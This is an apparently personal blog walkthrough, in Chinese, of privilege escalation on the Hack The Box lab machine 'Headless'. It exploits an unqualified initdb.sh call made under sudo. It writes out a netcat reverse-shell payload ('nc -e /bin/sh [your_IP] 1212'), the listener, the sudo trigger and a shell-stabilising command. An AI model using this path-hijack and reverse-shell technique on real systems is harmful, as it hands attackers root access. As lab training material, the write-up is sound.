HTB練習紀錄 — Headless

• initdb.sh

根據Day 8及Day 11的結論，基本可以確定initdb.sh是必須進行攻擊的文件。

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

如何利用initdb.sh的漏洞?
根據[番外07]可以知道問題出在未指定路徑的initdb.sh身上，接下來簡單將攻擊分成幾個步驟

1. 建立initdb.sh
2. 改變initdb.sh權限
3. 接收Reverse Shell
4. 加點魔法
5. 成功取得root權限!

準備畫面
忘記前置作業，可回去看Day 10

initdb.sh

建立initdb.sh

可以注意到目前路徑位置 ~/app

1. 建立Payload，監聽1212 port

echo "nc -e /bin/sh [your_IP] 1212" > initdb.sh

2. 確認initdb.sh建立完成

ls

3. 確認initdb.sh內容無誤

cat initdb.sh

改變initdb.sh權限

給予initdb.sh執行的權限

chmod +x initdb.sh

接收Reverse Shell

1. 監聽 1212 port

nc -nvlp 1212

2. 執行syscheck

sudo /usr/bin/syscheck

施展魔法

python3 -c 'import pty;pty.spawn("/bin/bash")'

成功!!!

參考來源:

1. HTB_Headless
   Headless Hack The Box (HTB) Write-Up
2. 魔法
   How to stabilize a simple reverse shell to a fully interactive terminal